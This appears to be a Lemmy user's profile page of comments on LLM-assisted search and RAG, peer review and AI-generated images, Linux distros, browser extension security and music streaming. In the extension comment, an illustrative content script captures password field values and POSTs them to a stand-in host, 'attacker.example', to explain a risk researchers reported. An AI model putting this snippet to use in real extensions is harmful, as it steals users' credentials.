Hi! I am Creesch, also creesch on other platforms :)

  • 0 Posts
  • 36 Comments
Joined 1 year ago
Cake day: July 2nd, 2023

  • What do you mean by “it”? The ChatGPT interface? Could be, but then you are also missing the point I am making.

    After all, ChatGPT is just one possible implementation of LLMs, and indeed not perfect in how they implemented some things, like search. In fact, I do think that they shot themselves in the foot by implementing search through Bing and implementing it poorly. It is basically nothing more than a proof-of-concept tech demo.

    That doesn’t mean that LLMs are useless for tasks like searching; it just means that you need to implement the functionality properly to make it possible. It certainly is possible to build search functionality around LLMs that is both capable and reviewable by a human user, to make sure it is not fucking up.

    Let me demonstrate. I am doing by hand some steps that you would normally automate with conventional code:

    I started out by asking ChatGPT a simple question.

    “I want to provide a list of all the children Bach had. What would be a suitable Google query?”

    It then responded with:

    “To compile a comprehensive list of Johann Sebastian Bach’s children, a suitable Google query would be: “List of Johann Sebastian Bach’s children names”. This query is specific enough to indicate that you’re looking for a detailed list, including the names of all the children, which should yield targeted results.”

    The following step I did manually, but it is something you would normally automate. I put the suggested query into Google, quickly grabbed the first 5 links, and then gave ChatGPT the following:

    The top 5 results in Google are the pages I provided below. Browse to each page, and answer the query “List of Johann Sebastian Bach’s children names”. Just answer the query, but let me know if there is conflicting information on the page.

    https://en.wikipedia.org/wiki/Bach_family
    https://www.classicfm.com/composers/bach/guides/children/
    https://www.bachonbach.com/100-bach-faq-and-soon-there-are-500-bach-faq/faq-26-what-were-the-names-of-all-of-johann-sebastian-bach-s-kids/
    https://www.spiritsound.com/music/bachchildren.html
    https://www.grahamsmusic.net/post/bach-s-wives-and-children

    It then proceeded to give me the following answer:

    Johann Sebastian Bach had 20 children in total. With his first wife, Maria Barbara Bach, he had seven children, four of whom survived into adulthood: Catharina Dorothea, Wilhelm Friedemann, Carl Philipp Emanuel, and Johann Gottfried Bernhard. With his second wife, Anna Magdalena Wilcke, he had 13 children, of whom six survived into adulthood: Gottfried Heinrich, Elisabeth Juliane Friederica, Johanna Carolina, Regina Susanna, Johann Christoph Friedrich, and Johann Christian.

    Going over the search results myself seems to confirm this list. Most importantly, except for the initial input, all of this can be automated. And of course a lot of it can be done better; I just didn’t want to spend too much time on it.
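
    To give an idea of what that automation could look like, here is a rough sketch in TypeScript. Everything in it is illustrative: `chatOnce()` targets an OpenAI-style chat endpoint, and `webSearch()` is a made-up stub you would wire up to an actual search API.

    ```typescript
    // Rough sketch of the manual steps above, automated.

    type ChatMessage = { role: "system" | "user"; content: string };

    // Call an OpenAI-style chat completion endpoint once.
    async function chatOnce(messages: ChatMessage[]): Promise<string> {
      const res = await fetch("https://api.openai.com/v1/chat/completions", {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
          Authorization: `Bearer ${process.env.OPENAI_API_KEY}`,
        },
        body: JSON.stringify({ model: "gpt-4", messages }),
      });
      const data = await res.json();
      return data.choices[0].message.content;
    }

    // Hypothetical stub: replace with any search API that returns result URLs.
    async function webSearch(_query: string, _n: number): Promise<string[]> {
      throw new Error("wire this up to a real search API");
    }

    async function answerViaSearch(question: string): Promise<string> {
      // Step 1: let the model phrase a suitable search query.
      const query = await chatOnce([
        {
          role: "user",
          content: `Suggest a suitable Google query for: "${question}". Reply with only the query.`,
        },
      ]);

      // Step 2: grab the top 5 result links (the part I did by hand above).
      const urls = await webSearch(query, 5);

      // Step 3: fetch the pages and have the model answer from them,
      // flagging conflicts so a human can review the outcome.
      const pages = await Promise.all(
        urls.map(async (url) => `URL: ${url}\n${await (await fetch(url)).text()}`),
      );
      return chatOnce([
        {
          role: "user",
          content: `Answer the query "${query}" using only the pages below. Note any conflicting information.\n\n${pages.join("\n\n---\n\n")}`,
        },
      ]);
    }
    ```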




  • True, though that isn’t all that different from people posting knee-jerk responses on the internet…

    I am not claiming they are perfect, but for the steps I described, a human aware of the limitations is perfectly able to validate the outcome, while still having saved a bunch of time and effort on the initial search pass.

    All I am saying is that it is fine to be critical of LLM and AI claims in general, as there is a lot of hype going on. But some people seem to lean towards the “they just suck, period” extreme end of the spectrum, which is no longer being critical but simply being a reverse fanboy/girl/person.


  • I don’t know how to say this in a less direct way. If this is your take, then you should probably look to get slightly more informed about what LLMs can do. Specifically, what they can do if you combine them with some code to fill the gaps.

    Things LLMs can do quite well:

    • Generate useful search queries.
    • Dig through provided text to determine what it contains.
    • Summarize text.

    These are all the building blocks for searching the internet. If you are talking about local documents and such, retrieval-augmented generation (RAG) can be pretty damn useful.
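
    As a bare-bones illustration of the retrieval side of RAG (a sketch, not tied to any specific vendor; `embed` and `ask` stand in for whatever embedding and chat APIs you use):

    ```typescript
    // Score chunks of your local documents against the question,
    // keep the most relevant ones, and let the model answer from those.

    function cosineSimilarity(a: number[], b: number[]): number {
      let dot = 0, normA = 0, normB = 0;
      for (let i = 0; i < a.length; i++) {
        dot += a[i] * b[i];
        normA += a[i] * a[i];
        normB += b[i] * b[i];
      }
      return dot / (Math.sqrt(normA) * Math.sqrt(normB));
    }

    async function ragAnswer(
      question: string,
      chunks: string[], // your documents, pre-split into chunks
      embed: (text: string) => Promise<number[]>, // embedding API of choice
      ask: (prompt: string) => Promise<string>, // chat API of choice
    ): Promise<string> {
      // Score every chunk against the question...
      const questionVec = await embed(question);
      const scored = await Promise.all(
        chunks.map(async (chunk) => ({
          chunk,
          score: cosineSimilarity(await embed(chunk), questionVec),
        })),
      );
      // ...keep the three most relevant ones as context...
      const context = scored
        .sort((a, b) => b.score - a.score)
        .slice(0, 3)
        .map((s) => s.chunk)
        .join("\n---\n");
      // ...and have the model answer grounded in that context.
      return ask(
        `Answer using only the context below.\n\nContext:\n${context}\n\nQuestion: ${question}`,
      );
    }
    ```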



  • For LLM training I do wonder if they assigned a weight, but I doubt it.

    Given my experience with models, I think they might actually assign a weight; otherwise, I would get a lot more bogus results. It also isn’t as if it is that difficult to implement some basic, naive weighting based on the number of stars/forks/etc. (a rough sketch of what I mean follows below).

    Of course, it might differ per model and depend on how they are trained.
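
    Something like this, purely as speculation on my part (not how any vendor actually trains): a naive per-repository sampling weight where popular repos count more, with a log to keep mega-repos from drowning out everything else.

    ```typescript
    // Hypothetical naive training-data weight for a repository.
    function sampleWeight(stars: number, forks: number): number {
      return 1 + Math.log1p(stars + 2 * forks);
    }
    ```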

    Having said that, I wouldn’t trust the output of an LLM to write secure code either. For me it is a very valuable tool for helping me debug issues, on the level of a slightly more intelligent rubber ducky. But when you ask most models to create anything more than basic functions/methods, you damn well make sure it actually does what you need it to do.

    I suppose there is some role there for seniors to train juniors in how to properly use this new set of tooling. In the end it is very similar to having to deal with people who copy-paste answers directly from Stack Overflow, expecting them to magically fix their problem.

    The fact that you not only need your code/tool to work but also need to understand why and how it works is something I am constantly trying to teach juniors at my workplace. What I often end up asking them is something along the lines of “Do you want to have learned a trick that might be obsolete in a few years? Or do you want to have mastered a set of skills and understanding which allows you to tackle new challenges when they arrive?”.


  • Most code on GitHub either is unsecure, or it was written without needing to be secure.

    That is a bit of a stretch, imho. There are myriad open source projects hosted on GitHub that do need to be secure in the context where they are used. I am curious how you came to that conclusion.

    I’m already getting pull requests from juniors trying to sneak in AI generated code without actually reading it.

    That is worrisome, though. I assume these people have had some background/education in the field before they were hired?


  • I feel like two different problems are being conflated into one, though.

    1. The academic review process is broken.
    2. AI generated bullshit is going to cause all sorts of issues.

    Point 2 can contribute to point 1, but for that a bunch of stuff needs to happen. Correct me if I am wrong, but as far as I understand it, the peer-review process is supposed to go something along the lines of:

    1. A researcher submits their manuscript to a journal.
    2. An editor of that journal validates the paper fits within the scope and aims of the journal. It might get rejected here, or it gets sent out for review.
    3. When it does, it is sent out for review to several experts in the field, the actual peer reviewers. These are supposed to be knowledgeable about the specific topic the paper covers. They then **read the paper closely and evaluate things like methodology, results, (lack of) data, and conclusions**.
    4. Feedback goes to the editor, who then makes a call about the paper: it either gets accepted, revisions are required, or it gets rejected.

    If at point 3 people don’t do the things I highlighted in bold, then to me it seems a bit silly to make this about AI. If at point 4 the editor ignores most feedback from the peer reviewers, then it again has very little to do with AI and everything to do with a broken base process.

    To summarize: yes, AI is going to fuck up a lot of information; it already has. But by just shouting “AI is at it again with its antics!” at every turn, instead of looking further into other core issues, we will only make things worse.

    Edit:

    To be clear, I am not even saying that peer reviewers or editors should “just do their job already”. But fake papers have been an increasing issue for well over a decade, as far as I am aware. The way the current peer review process works simply doesn’t seem to scale to where we are today. And yes, AI is not going to help with that, but it is building upon something that was already broken before AI was used to abuse it.


  • I totally see why you are worried about all the aspects AI introduces, especially regarding bias and the authenticity of generated content. My main gripe, though, is with the oversight (or lack thereof) in the peer review process. If a journal can’t even spot AI-generated images, it raises red flags about the entire paper’s credibility, regardless of the content’s origin. It’s not about AI per se; it is about ensuring the integrity of scholarly work. Because realistically speaking, how much of the paper itself is actually good or valid?

    Even more interesting, and this would bring AI back into the picture: is the entire paper even written by a human, or is the entire thing fake? Or maybe that is not interesting at all, as there are already tons of papers published with other fake data in them. People who don’t actually give a shit about the academic process and just care about getting their names published have likely already employed other methods as well. I wouldn’t be surprised if there is a paper out there with equally bogus images created by an actual human for pennies on Fiverr.

    The crux of the matter is the robustness of the review process, which should safeguard against any form of dubious content, AI-generated or otherwise. This is what I also said in my initial reply: I am most certainly not waving my hands and saying that review is enough. I am saying that it is much more likely the review process has already failed miserably, and has most likely been failing for a while.

    Which, again to me, seems like the bigger issue.


  • This feels like clickbait to me, as the fundamental problem clearly isn’t AI; at least to me it isn’t. The title would have worked just as well without AI in it. The fact that the images are AI-generated isn’t even that relevant. What is worrying is that the peer review process, at least for this journal, is clearly faulty, as no actual review of the material took place.

    If we do want to talk about AI: I am impressed how well the model managed to create text made up of actual letters resembling words. From what I have seen so far, that is often just as difficult for these models as hands are.


  • They’re for different needs.

    Yes… but also extremely no. Superficially you are right, but a lot of the reasons new distros are created come down to human nature, covering everything from infighting over inane issues to more pragmatic motives. A lot of them, probably even a majority, don’t provide enough actual differentiators to honestly claim they exist because of different needs. In the end it all boils down to the fact that people can just create a new distro when they feel like it.

    Which is a strength in one way, but not with regard to fragmentation.


  • I am not quite sure why there are all these bullet points that have very little to do with the actual issue.

    Researchers at the University of Wisconsin–Madison found that Chrome browser extensions can still steal passwords, despite compliance with Chrome’s latest security standard, Manifest V3.

    I am not sure how Manifest V3 is relevant here? Nothing in Manifest V3 suggests that content_scripts can’t access the DOM.

    The core issue lies in the extensions’ full access to the Document Object Model (DOM) of web pages, allowing them to interact with text input fields like passwords.

    I’d also say this isn’t directly the issue. Yes, content_scripts needing an extra permission to access password input fields would help, of course.

    Analysis of existing extensions showed that 12.5% had the permissions to exploit this vulnerability, identifying 190 extensions that directly access password fields.

    Yes… because accessing the DOM and interacting with it is what browser extensions do. If anything, that 12.5% feels low, so I am going to guess it is the combination of accessing the DOM and being able to phone home with that information.
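
    For illustration, a hypothetical content script showing that combination; nothing here uses anything beyond what an ordinary content_scripts entry in an extension’s manifest already grants:

    ```typescript
    // content-script.ts: made-up sketch of the described risk, for
    // illustration only. Any extension whose content script runs on a
    // page can read password fields straight from the DOM; nothing in
    // Manifest V3 prevents this.
    document.addEventListener("change", (event) => {
      const target = event.target;
      if (target instanceof HTMLInputElement && target.type === "password") {
        // "Phoning home": exfiltrate the value to an attacker-controlled
        // server (made-up URL).
        fetch("https://attacker.example/collect", {
          method: "POST",
          body: JSON.stringify({ site: location.hostname, value: target.value }),
        });
      }
    });
    ```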

    A proof of concept extension successfully passed the Chrome Web Store review process, demonstrating the vulnerability.

    This, to me, feels like the core of the issue right now. The behavior as described has always been part of browser extensions, and Manifest V3 didn’t change that or make a claim in that direction as far as I know. So it isn’t directly relevant here. I’d also say that Firefox is just as much at risk; their review process has changed a lot over the years and isn’t always as thorough as people tend to think it is.

    Researchers propose two fixes: a JavaScript library for websites to block unwanted access to password fields, and a browser-level alert system for password field interactions.

    “A JavaScript library” is not going to do much against extension content_scripts accessing the DOM.

    The alert system does seem better, but that might as well become a browser extension permission.

    To be clear, I am not saying that all is fine and there are no risks. I just think that the bullet point summary doesn’t really focus on the right things.





  • I am dissapointed in that I have not been able to get a single mathematic equation produced (like famous ones), but I know they can?

    Well, my understanding is that they actually can’t. LLMs do “language” mostly based on what is called “next word prediction”: they basically look at the text so far and predict what the most logical next word would be (somewhat simplified). So numbers to them are not numbers but words, which is why they are fairly bad at them.
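
    As a toy sketch of that prediction loop (greedy decoding; `scoreNextTokens` stands in for the actual model, this is not any real API):

    ```typescript
    // Toy sketch of "next word prediction". The point: the digits in
    // "2 + 2 =" are just tokens like any other, so arithmetic comes out
    // of pattern matching rather than calculation.
    function generate(
      prompt: string[],
      scoreNextTokens: (context: string[]) => Map<string, number>,
      maxNewTokens = 20,
    ): string[] {
      const tokens = [...prompt];
      for (let i = 0; i < maxNewTokens; i++) {
        // Ask the "model" how likely each candidate next token is...
        const scores = scoreNextTokens(tokens);
        // ...and greedily append the single most likely one.
        let best = "";
        let bestScore = -Infinity;
        for (const [token, score] of scores) {
          if (score > bestScore) {
            best = token;
            bestScore = score;
          }
        }
        tokens.push(best);
      }
      return tokens;
    }
    ```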

    Opera has Aria, which is like the cleanest version of ChatGPT

    Pass. Not sure what stake the Chinese owners have these days, but Opera is a bit too… feature-rich in everything.

    I do like working with just chat.openai.com for simple stuff. It is great at helping me debug things in areas where I don’t quite have all the knowledge I’d like. For example, I recently had to work on a bash shell script, something I don’t do often, and as an added bonus it needed to work both on macOS machines and with the bash version shipped with “git bash” on Windows. macOS utilities (BSD rather than GNU) already function slightly differently at times, but git bash on Windows is entirely broken in some areas. Where yesterday I spent an hour on Google trying to find something relevant based on my input and the error I got, ChatGPT managed to point out the pain point right away.

    And that is where I feel ChatGPT (in this case anyway) does a great job: troubleshooting issues with things that are not necessarily bleeding edge. I just presented it with a clear problem and a bit of context and asked why that could be the case. It also got it wrong a few times, but that is fine; it did save me a bunch of time in the end.


  • Bing and Google Bard keep disappointing me. Bing for some reason only picks up on half of what I ask, which is extremely odd, as it is supposedly ChatGPT-based and ChatGPT gives pretty good answers to the same queries. The only problem with the latter is that a lot of its information is of course outdated.

    Bard might just be broken for me. I keep getting I'm a text-based AI, and that is outside of my capabilities. or similar responses.


  • Is Tidal/Deezer worth it? (Creesch@beehaw.org to Android@lemdro.id, 1 year ago)

    I realize you asked for other recommendations, but I suspect you don’t actually want to maintain your own music library and would rather have streaming services recommended?

    Of the two alternatives you are currently looking at, I do have experience with Deezer, although it has been at least two years. The music library is almost as complete as Spotify’s; in my experience I rarely had issues with songs not being on there. The recommendation algorithm at the time was nice, but it would sometimes get stuck in a hyper-specific genre that would only reinforce itself.

    For HiFi audio you do need fairly good audio gear (decent wired headphones, for example). I’d say that for most people it is not worth paying extra, as it is really difficult to tell the difference.

    One other service I have used is YouTube Music, as it is included in Premium. It does not have a HiFi option but is otherwise fairly okay. Basically worth looking into if you were also considering YouTube Premium, but otherwise not really special.


  • Yeah, you raise some valid points about the future of Reddit itself and communities being forced to move. A few things I specifically still want to reply to:

    I guess I also don’t get the concern about picking “the right lemmy instance” - at worst, it’s like picking an e-mail server, or grocery store. Try a random one, find out what doesn’t work for you (if anything) and then use that knowledge to evaluate the next one.

    Well yeah, but that is easy to say in hindsight. If all you have heard is “Lemmy” and you start looking things up, it can become a bit overwhelming and difficult to figure out, ironically in part because a lot of people are trying to put information out there, but not everyone is good at creating easy-to-follow resources. From a user perspective, you are entirely right. From a community perspective it is slightly more complex: you either need to find the money and people with the technical know-how to host your own instance, or find a reliable instance that allows community creation.

    I tend to quote and comment on the part of a comment I’m replying to that I have something to say about it.

    On Reddit I, personally, also wouldn’t have assumed that to be the intent, often because that is not what is happening. What I do when I just want to reply to something specific is state it, something along the lines of “I generally agree with your post/comment, but I have a slightly different view of this part specifically,” and then follow with the quote.

    this is a rant (so don’t take it that seriously)

    Heh, some people want their rants to be taken very seriously :) So again, just add it as context: not just stating that it is a rant, but that because of that it doesn’t have to be taken seriously.